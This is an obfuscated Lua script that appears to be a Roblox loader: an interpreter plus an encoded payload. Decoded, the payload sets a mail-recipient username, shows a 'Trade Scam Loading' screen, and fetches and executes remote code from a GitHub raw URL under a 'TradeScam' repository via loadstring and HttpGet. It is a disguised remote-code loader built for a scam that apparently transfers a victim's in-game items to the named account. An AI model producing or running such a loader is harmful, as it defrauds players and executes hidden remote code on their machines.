--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v101=v5(v83,v19);v19=nil;return v101;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -(1 + 0))) -(v32-(620 -(555 + 64)))) + (932 -((1734 -(282 + 595)) + 74)))) ;return v84-(v84%(569 -((2004 -(1523 + 114)) + 201))) ;else local v85=2^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + ((4 + 0) -3) ;v34=118 -(32 + 85) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (4 -2) ;return (v37 * (472 -216)) + v36 ;end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -(0 -0))) then return (v42 * (16777566 -(87 + 263))) + (v41 * ((38733 + 27755) -((1054 -252) + 150))) + (v40 * (689 -433)) + v39 ;end if (v38==(180 -(67 + 113))) then v39,v40,v41,v42=v1(v16,v18,v18 + (1190 -(1069 + 118)) + 0 );v18=v18 + 3 + 1 ;v38=998 -(915 + 82) ;end end end local function v24()local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(6 -3)) then if (v48==(0 -0)) then if (v47==(0 + 0)) then return v49 * ((0 -0) -0) ;else v48=1 + 0 ;v46=0;end elseif (v48==((3697 -(814 + 45)) -(368 + (1042 -619)))) then return ((v47==(0 + 0)) and (v49 * ((3 -2)/(18 -(10 + 8))))) or (v49 * NaN) ;end return v8(v49,v48-(3934 -2911) ) * (v46 + (v47/((444 -(416 + 26))^(165 -113)))) ;end if (v43==(1 + 1)) then v48=v20(v45,8 + 13 ,54 -(908 -(261 + 624)) );v49=((v20(v45,32)==(439 -((257 -112) + 293))) and  -(431 -(44 + 386))) or (1487 -(998 + 488)) ;v43=3;end if (v43==1) then v46=1 + 0 ;v47=(v20(v45,1 + 0 ,792 -(201 + 571) ) * (((2220 -(1020 + 60)) -(116 + 1022))^(133 -101))) + v44 ;v43=2;end if (v43==(0 + 0)) then v44=v23();v45=v23();v43=3 -2 ;end end end local function v25(v50)local v51=1423 -(630 + 793) ;local v52;local v53;while true do if (v51==2) then v53={};for v93=3 -2 , #v52 do v53[v93]=v2(v1(v3(v52,v93,v93)));end v51=(54 -40) -11 ;end if ((1 + 0)==v51) then v52=v3(v16,v18,(v18 + v50) -(3 -2) );v18=v18 + v50 ;v51=1749 -(760 + 987) ;end if (v51==(1913 -(1789 + 124))) then v52=nil;if  not v50 then v50=v23();if (v50==(766 -(7 + 738 + 21))) then return "";end end v51=1 + 0 ;end if (v51==(7 -4)) then return v6(v53);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v54==2) then local v89=0 -0 ;while true do if (v89==(2 -1)) then v54=1772 -(1749 + 20) ;break;end if (v89~=0) then else v59=nil;v60=nil;v89=1 + 0 ;end end end if ((1325 -(1249 + 73))==v54) then v61=nil;while true do local v95=0 + 0 ;local v96;while true do if (v95==(1145 -(466 + 679))) then v96=0 -0 ;while true do if (v96~=0) then else local v103=0;while true do if (v103~=(2 -1)) then else v96=1901 -(106 + 1794) ;break;end if (v103==(0 + 0)) then if (v55~=2) then else local v154=0 + 0 ;local v155;while true do if (v154~=(0 -0)) then else v155=0 -0 ;while true do local v167=114 -(4 + 110) ;while true do if (v167==(584 -(57 + 527))) then if (v155==(1428 -(41 + 1386))) then return v59;end if ((103 -(17 + 86))==v155) then for v175=1 + 0 ,v23() do local v176=0;local v177;local v178;local v179;while true do if ((1 -0)~=v176) then else v179=nil;while true do if (v177~=0) then else v178=0;v179=nil;v177=1;end if (v177==1) then while true do if (v178~=0) then else v179=v21();if (v20(v179,2 -1 ,167 -(122 + 44) )==0) then local v191=0;local v192;local v193;local v194;while true do if (v191==(2 -0)) then local v195=0 -0 ;while true do if (v195~=0) then else local v204=0;while true do if (v204~=(0 + 0)) then else if (v20(v193,1,1)==(1 + 0)) then v194[2]=v61[v194[2]];end if (v20(v193,2,3 -1 )~=1) then else v194[68 -(30 + 35) ]=v61[v194[3 + 0 ]];end v204=1258 -(1043 + 214) ;end if (v204==1) then v195=3 -2 ;break;end end end if (v195~=(1213 -(323 + 889))) then else v191=3;break;end end end if (v191==(0 -0)) then local v196=580 -(361 + 219) ;while true do if (v196~=1) then else v191=321 -(53 + 267) ;break;end if (v196~=0) then else v192=v20(v179,1 + 1 ,3);v193=v20(v179,4,419 -(15 + 398) );v196=1;end end end if (v191==3) then if (v20(v193,3,985 -(18 + 964) )~=(3 -2)) then else v194[3 + 1 ]=v61[v194[3 + 1 ]];end v56[v175]=v194;break;end if (v191==1) then local v198=850 -(20 + 830) ;local v199;while true do if (v198~=(0 + 0)) then else v199=0;while true do if (v199==(126 -(116 + 10))) then v194={v22(),v22(),nil,nil};if (v192==0) then local v213=738 -(542 + 196) ;local v214;while true do if (v213~=0) then else v214=0;while true do if (v214==0) then v194[3]=v22();v194[4]=v22();break;end end break;end end elseif (v192==(1 -0)) then v194[3]=v23();elseif (v192==2) then v194[3]=v23() -((1 + 1)^(9 + 7)) ;elseif (v192==(2 + 1)) then local v221=0 -0 ;local v222;local v223;while true do if (v221~=0) then else v222=0 -0 ;v223=nil;v221=1;end if (v221~=1) then else while true do if (v222~=(1551 -(1126 + 425))) then else v223=405 -(118 + 287) ;while true do if (v223~=(0 -0)) then else v194[1124 -(118 + 1003) ]=v23() -(2^(46 -30)) ;v194[4]=v22();break;end end break;end end break;end end end v199=378 -(142 + 235) ;end if (v199==(4 -3)) then v191=2;break;end end break;end end end end end break;end end break;end end break;end if (v176==0) then v177=0 + 0 ;v178=nil;v176=1;end end end for v180=978 -(553 + 424) ,v23() do v57[v180-(1 -0) ]=v28();end v155=1 + 0 ;end break;end end end break;end end end if (v55==(1 + 0)) then local v156=0;local v157;local v158;while true do if (v156~=0) then else v157=0 + 0 ;v158=nil;v156=1 + 0 ;end if (v156==(1 + 0)) then while true do if (v157==0) then v158=0 -0 ;while true do if (v158==(2 -1)) then local v171=0 -0 ;local v172;while true do if (v171==(0 + 0)) then v172=0;while true do if (v172==0) then local v182=0 -0 ;while true do if (v182~=(753 -(239 + 514))) then else for v184=1 + 0 ,v60 do local v185=1329 -(797 + 532) ;local v186;local v187;local v188;local v189;local v190;while true do if ((0 + 0)~=v185) then else v186=0 + 0 ;v187=nil;v185=1;end if (v185~=1) then else v188=nil;v189=nil;v185=4 -2 ;end if (v185~=2) then else v190=nil;while true do if (v186==2) then while true do if (v187==(1202 -(373 + 829))) then local v205=731 -(476 + 255) ;local v206;while true do if (v205==(1130 -(369 + 761))) then v206=0 + 0 ;while true do if (v206~=0) then else local v216=0 -0 ;while true do if (v216==1) then v206=1 -0 ;break;end if (v216==0) then v188=238 -(64 + 174) ;v189=nil;v216=1 + 0 ;end end end if (v206~=(1 -0)) then else v187=337 -(144 + 192) ;break;end end break;end end end if (v187==1) then v190=nil;while true do if (v188==(216 -(42 + 174))) then local v207=0;while true do if (v207==0) then local v217=0 + 0 ;while true do if (v217==1) then v207=1 + 0 ;break;end if ((0 + 0)~=v217) then else v189=v21();v190=nil;v217=1;end end end if ((1505 -(363 + 1141))==v207) then v188=1581 -(1183 + 397) ;break;end end end if (v188~=1) then else if (v189==(2 -1)) then v190=v21()~=0 ;elseif (v189==(2 + 0)) then v190=v24();elseif (v189==(3 + 0)) then v190=v25();end v61[v184]=v190;break;end end break;end end break;end if (v186==(1976 -(1913 + 62))) then local v200=0;while true do if (v200==(1 + 0)) then v186=2;break;end if (v200==(0 -0)) then v189=nil;v190=nil;v200=1;end end end if (v186==0) then local v201=0;while true do if (v201==(1934 -(565 + 1368))) then v186=1;break;end if (v201~=(0 -0)) then else v187=1661 -(1477 + 184) ;v188=nil;v201=1;end end end end break;end end end v59[3]=v21();v182=1;end if (v182~=1) then else v172=1;break;end end end if (v172~=1) then else v158=2 -0 ;break;end end break;end end end if (v158==0) then local v173=0 + 0 ;while true do if (v173~=(856 -(564 + 292))) then else v60=v23();v61={};v173=1 -0 ;end if (v173==(2 -1)) then v158=1;break;end end end if (v158~=2) then else v55=2;break;end end break;end end break;end end end v103=1;end end end if (v96==1) then if (v55~=0) then else local v122=304 -(244 + 60) ;local v123;local v124;while true do if (v122==(0 + 0)) then v123=476 -(41 + 435) ;v124=nil;v122=1;end if (v122==1) then while true do if (v123~=(1001 -(938 + 63))) then else v124=0 + 0 ;while true do if (v124~=(1126 -(936 + 189))) then else v58={};v59={v56,v57,nil,v58};v124=2;end if (v124~=2) then else v55=268 -(176 + 91) ;break;end if (v124==(0 -0)) then local v170=0 -0 ;while true do if (v170==(1092 -(975 + 117))) then local v174=0;while true do if (v174==(1876 -(157 + 1718))) then v170=1;break;end if (v174==0) then v56={};v57={};v174=1;end end end if (v170==(1 + 0)) then v124=3 -2 ;break;end end end end break;end end break;end end end break;end end break;end end end break;end if (v54==(0 -0)) then local v90=0;local v91;while true do if (0~=v90) then else v91=0;while true do if (v91==(1019 -(697 + 321))) then v54=2 -1 ;break;end if (v91==(0 -0)) then local v102=0 -0 ;while true do if (v102==(0 + 0)) then v55=0 -0 ;v56=nil;v102=1;end if (v102~=(2 -1)) then else v91=1;break;end end end end break;end end end if (1~=v54) then else local v92=1227 -(322 + 905) ;while true do if (v92==(611 -(602 + 9))) then v57=nil;v58=nil;v92=1;end if (v92==1) then v54=1191 -(449 + 740) ;break;end end end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=9) then if (v81<=4) then if (v81<=1) then if (v81==0) then v78[v80[2]]=v80[3];else v64[v80[3]]=v78[v80[2]];end elseif (v81<=2) then v78[v80[2]]();elseif (v81>3) then local v125=0;local v126;local v127;local v128;local v129;while true do if (v125==1) then v73=(v128 + v126) -1 ;v129=0;v125=2;end if (v125==0) then v126=v80[2];v127,v128=v71(v78[v126](v13(v78,v126 + 1 ,v80[3])));v125=1;end if (v125==2) then for v165=v126,v73 do local v166=0;while true do if (v166==0) then v129=v129 + 1 ;v78[v165]=v127[v129];break;end end end break;end end else v72=v80[3];end elseif (v81<=6) then if (v81>5) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v64[v80[3]]=v78[v80[2]];end elseif (v81<=7) then local v110=0;local v111;while true do if (v110==0) then v111=v80[2];v78[v111]=v78[v111](v13(v78,v111 + 1 ,v73));break;end end elseif (v81>8) then do return;end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=14) then if (v81<=11) then if (v81>10) then do return;end else local v112=0;local v113;local v114;while true do if (v112==1) then v78[v113 + 1 ]=v114;v78[v113]=v114[v80[4]];break;end if (v112==0) then v113=v80[2];v114=v78[v80[3]];v112=1;end end end elseif (v81<=12) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==13) then local v133=v80[2];v78[v133]=v78[v133](v13(v78,v133 + 1 ,v73));else v72=v80[3];end elseif (v81<=16) then if (v81==15) then local v115=v80[2];local v116,v117=v71(v78[v115](v13(v78,v115 + 1 ,v80[3])));v73=(v117 + v115) -1 ;local v118=0;for v119=v115,v73 do v118=v118 + 1 ;v78[v119]=v116[v118];end else v78[v80[2]]();end elseif (v81<=17) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81==18) then local v139=0;local v140;local v141;while true do if (v139==0) then v140=v80[2];v141=v78[v80[3]];v139=1;end if (v139==1) then v78[v140 + 1 ]=v141;v78[v140]=v141[v80[4]];break;end end else v78[v80[2]]=v80[3];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O7361676503043O00446F6E65030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F53637269707454726164655363616D2F54726164655363616D50732O392F6D61696E2F74756D62616C03083O00557365726E616D65030C3O00616C6D616869726131393236030F3O00475F4C6F6164696E675363722O656E03153O005472616465205363616D204C6F6164696E673O2E00163O00124O00013O00260C3O000D0001000200040E3O000D000100122O000100043O001201000100033O001208000100053O001208000200063O00200A00020002000700122O000400084O000F000200044O000700013O00022O000200010001000100040E3O0015000100260C3O00010001000100040E3O0001000100122O0001000A3O001201000100093O00122O0001000C3O0012010001000B3O00124O00023O00040E3O000100012O00093O00017O00",v9(),...);
